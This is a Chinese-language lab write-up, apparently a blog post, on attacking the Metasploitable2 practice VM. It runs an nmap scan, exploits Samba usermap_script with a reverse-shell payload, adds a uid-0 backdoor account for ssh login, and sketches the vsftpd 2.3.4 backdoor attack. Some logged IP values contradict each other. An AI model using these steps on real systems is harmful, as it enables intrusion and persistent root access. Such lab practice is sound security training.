MetaSploit渗透测试2-Metasploitable2-linux

  1. Metasploitable2 它是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常 见漏洞攻击

  2. samba漏洞利用,获得shell
  3. 熟悉ssh工具的基本使用

  1. 搭建kali和Metasploitable2靶机环境

Kali:inet 192.168.6.129  netmask 255.255.255.0  broadcast 192.168.6.255

172.17.152.196 登录:msfadmin/msfadmin proot:sudo su root 密码:msfadmin

  1. 使用nmap扫码发现靶机,并使用msf6进行渗透测试

nmap -nsP 192.168.6.0/24

nmap -sV 192.168.11.128扫描该主机的全部端口,并查看对应端口的服务Service的版本 Version目标计算机是metasploitable2 445端口(Samba smbd 3.X - 4.X)可以作为目标利用

选择exploit路径: exploit/multi/samba/usermap_script 使用该exploit进行配置、渗透利用 msf5 > use exploit/multi/samba/usermap_script pmsf5 exploit(multi/samba/usermap_script) >

show payloads

选择 cmd/unix/reverse

msf6 payload(cmd/unix/reverse) > set rhost 172.17.152.196

rhost => 192.168.11.128

msf6 payload(cmd/unix/reverse) > set rport 445

rport => 445

msf6 payload(cmd/unix/reverse) > set lhost 192.168.6.129

lhost => 192.168.6.129

msf6 payload(cmd/unix/reverse) > show options

msf5 exploit(multi/samba/usermap_script) > exploit

成功

 实现目标Linux进入

  1. 使用meterpreter进行靶机利用:

(1)基本访问

(2)创建账号/密码

(3)在Windows使用ssh工具实现对靶机的ssh连接

whoami,查看当前用户角色 直接创建root账户xyz puseradd -u 0 -o -g root -G root -d /home/xyz xyz p设置xyz的密码为123 ppasswd xyz 完成后,可以用vim /etc/passwd 查看,或者重新登录使用xyz账户

尝试连接xyz/123,成功

(4)其它利用

一.Mysql

账号root  密码为空

二、Metasploitable2漏洞列表21端口Vsftpd2.3.4

特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)“为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

扫描

通过nmap扫描查找到vsftpd2.3.4开启

  攻击

使用msfconsole工具调出metasploit

使用search 查找模块

使用use设置模块

使用show options查看需配置的参数

使用set设置需配置的参数

使用exploit进行攻击攻击成功获取到靶机的权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值